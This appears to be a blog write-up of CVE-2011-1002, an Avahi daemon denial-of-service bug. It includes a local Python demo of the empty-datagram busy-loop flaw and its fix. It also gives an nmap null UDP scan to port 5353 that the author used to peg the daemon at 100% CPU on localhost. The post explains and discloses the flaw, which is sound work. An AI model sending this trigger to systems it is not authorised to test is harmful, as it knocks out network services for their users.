CVE-2011-1002: Avahi Daemon Remote Denial of Service

While browsing around [1], I ended up finding this advisory: "CVE-2011-1002: Avahi Daemon Remote Denial of Service". I looked for details and soon found a write-up about it, which even links to a patch [2].

The description of CVE-2011-1002 is as follows:

avahi-core/socket.c in avahi-daemon in Avahi before 0.6.29 allows remote attackers to cause a denial of service (infinite loop) via an empty (1) IPv4 or (2) IPv6 UDP packet to port 5353. NOTE: this vulnerability exists because of an incorrect fix for CVE-2010-2244.
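To make the "infinite loop" in that description concrete, here is an added local demo (constructed for this post, not Avahi's own code) of the receive-path pattern behind the bug: a non-blocking UDP reader that learns the size of the pending datagram before reading it (assumed to be ioctl(FIONREAD) in avahi-core/socket.c; MSG_PEEK stands in for it here) and, in the vulnerable variant, rejects a zero-length packet without ever dequeuing it. Because the datagram stays in the kernel queue, the socket remains readable and the event loop spins at 100% CPU; the fixed variant always consumes the datagram first and then drops it. Everything runs on loopback with an ephemeral port, and the iteration cap is only there so the vulnerable variant terminates.

```python
import select
import socket

# Constructed local demo (not Avahi's code): a UDP reader in the style of
# avahi-core/socket.c, where the handler first asks how many bytes are pending
# (assumed to be ioctl(FIONREAD) in Avahi; MSG_PEEK stands in for it here) and,
# in the vulnerable variant, gives up on a zero-length packet WITHOUT reading it.

MAX_ITERATIONS = 50   # cap so the vulnerable variant terminates in this demo


def make_local_pair():
    """Bind a non-blocking UDP 'daemon' socket on loopback plus a client socket."""
    daemon = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    daemon.bind(("127.0.0.1", 0))   # ephemeral port instead of 5353
    daemon.setblocking(False)
    client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    return daemon, client


def handle_readable(sock, fixed):
    """Receive one datagram. Returns its payload, or None if it was discarded.

    fixed=False reproduces the CVE-2011-1002 pattern: the empty packet is
    detected and rejected but left in the kernel queue, so the socket stays
    readable forever.  fixed=True always consumes the datagram first.
    """
    try:
        pending, _ = sock.recvfrom(65535, socket.MSG_PEEK)
    except BlockingIOError:
        return None
    if len(pending) == 0 and not fixed:
        return None          # BUG: early return, datagram never dequeued
    payload, _ = sock.recvfrom(65535)   # dequeue it
    if len(payload) == 0:
        return None          # empty packet: drop, but it is gone from the queue
    return payload


def serve(sock, fixed):
    """Minimal event loop. Returns how many times select() reported the socket readable."""
    wakeups = 0
    for _ in range(MAX_ITERATIONS):
        readable, _, _ = select.select([sock], [], [], 0.05)
        if not readable:
            break            # queue drained, loop goes idle as it should
        wakeups += 1
        handle_readable(sock, fixed)
    return wakeups


def run_demo():
    """Send one empty datagram to each variant; return (vulnerable_wakeups, fixed_wakeups)."""
    results = []
    for fixed in (False, True):
        daemon, client = make_local_pair()
        try:
            client.sendto(b"", daemon.getsockname())   # the zero-length UDP packet
            results.append(serve(daemon, fixed))
        finally:
            client.close()
            daemon.close()
    return tuple(results)


if __name__ == "__main__":
    vulnerable, patched = run_demo()
    print(f"vulnerable reader: {vulnerable} wakeups (hit the cap -> busy loop, 100% CPU)")
    print(f"fixed reader:      {patched} wakeup(s), then idle")
```

The vulnerable reader hits the iteration cap (50 wakeups for a single packet) while the fixed reader wakes once and goes idle, which is exactly the difference between the pegged avahi-daemon shown in the top output below and a patched 0.6.29 build. The lesson for anyone writing a datagram server is the same as the patch's: whatever validation you do on a packet, dequeue it before returning.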

For anyone curious to test this bug locally, it is quite simple: just send an empty (NULL) UDP packet to the Avahi daemon (port 5353).

So I decided to test it with nmap:

nmap -sU -sN localhost -p5353
 
Starting Nmap 4.62 ( http://nmap.org ) at 2011-02-26 23:36 BRT
Interesting ports on localhost (127.0.0.1):
PORT     STATE         SERVICE
5353/tcp closed        unknown
5353/udp open|filtered zeroconf
 
Nmap done: 1 IP address (1 host up) scanned in 0.299 seconds

And that's it! Running top was enough to confirm it:

  PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND
 7634 avahi     20   0  2884 1444 1224 R  100  0.1   5:55.18 avahi-daemon

Trying to stop it, we get the following:

/etc/init.d/avahi-daemon stop
Stopping Avahi mDNS/DNS-SD Daemon: avahi-daemon
Failed to kill daemon: Timer expired
 (warning).

So the solution was to kill the process.

[1] - https://bugzilla.redhat.com/show_bug.cgi?id=667187
[2] - http://xorl.wordpress.com/2011/02/20/cve-2011-1002-avahi-daemon-remote-d...

Who needs an exploit, nmap

Who needs an exploit, nmap ftw XD
